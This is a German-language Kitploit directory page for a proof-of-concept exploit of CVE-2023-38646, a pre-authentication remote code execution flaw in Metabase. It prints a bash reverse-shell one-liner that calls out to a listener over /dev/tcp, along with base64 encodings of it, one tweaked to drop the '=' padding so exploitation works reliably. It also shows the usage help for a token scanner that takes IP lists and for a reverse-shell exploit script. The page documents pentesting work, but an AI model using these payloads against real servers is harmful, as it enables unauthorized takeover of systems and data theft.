Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-38646 — PoC-Exploit für CVE-2023-38646, eine Pre-Authentifizierungs-RCE in Metabase. Enthält einen Reverse-Shell-Payload-Generator mit Korrektur der Base64-Kodierung für eine zuverlässige Ausnutzung. | Kitploit
Tools/GitHubGitHub/yxl2001/cve-2023-38646
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubyxl2001/cve-2023-38646

CVE-2023-38646

PoC-Exploit für CVE-2023-38646, eine Pre-Authentifizierungs-RCE in Metabase. Enthält einen Reverse-Shell-Payload-Generator mit Korrektur der Base64-Kodierung für eine zuverlässige Ausnutzung.

Repository anzeigen
vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-38646

Das ursprüngliche Skript stammt von securezeron

Während der Tests habe ich festgestellt, dass die Reverse-Shell, die von diesem POC generiert wurde, nach der Base64-Kodierung aufgrund des '='-Zeichens am Ende fehlschlug. Ich habe es leicht modifiziert, um dieses Problem zu beheben.

root@kitploit:~
#原始的生成reverse shell负载的代码
>>> base64.b64encode("bash -i >&/dev/tcp/10.10.14.59/8080 0>&1".encode()).decode()
'YmFzaCAtaSA+Ji9kZXYvdGNwLzEwLjEwLjE0LjU5LzgwODAgMD4mMQ=='

#修改后的生成reverse shell负载的代码没有‘=’
>>> base64.b64encode("bash -i > &/dev/tcp/10.10.14.59/8080 0>&1 ".encode()).decode()
'YmFzaCAtaSA+ICYvZGV2L3RjcC8xMC4xMC4xNC41OS84MDgwIDA+JjEg'

Verwendung

root@kitploit:~
└─# python CVE-2023-38646-POC.py -h                                                                           
usage: CVE-2023-38646-POC.py [-h] [--ip IP] [--list LIST]

Check setup token

options:
  -h, --help   show this help message and exit
  --ip IP      IP address
  --list LIST  Filename containing list of IP addresses
                                                                                                                    

└─# python CVE-2023-38646-Reverse-Shell.py -h                                                                 
usage: CVE-2023-38646-Reverse-Shell.py [-h] [--rhost RHOST] [--lhost LHOST] [--lport LPORT]

Check setup token

options:
  -h, --help     show this help message and exit
  --rhost RHOST  Metabase server IP address (including http:// or https:// and port number if needed)
  --lhost LHOST  Listener IP address
  --lport LPORT  Listener port (default is 4444)

Weitere Informationen zu der Schwachstelle finden Sie unter https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/

Tool herunterladen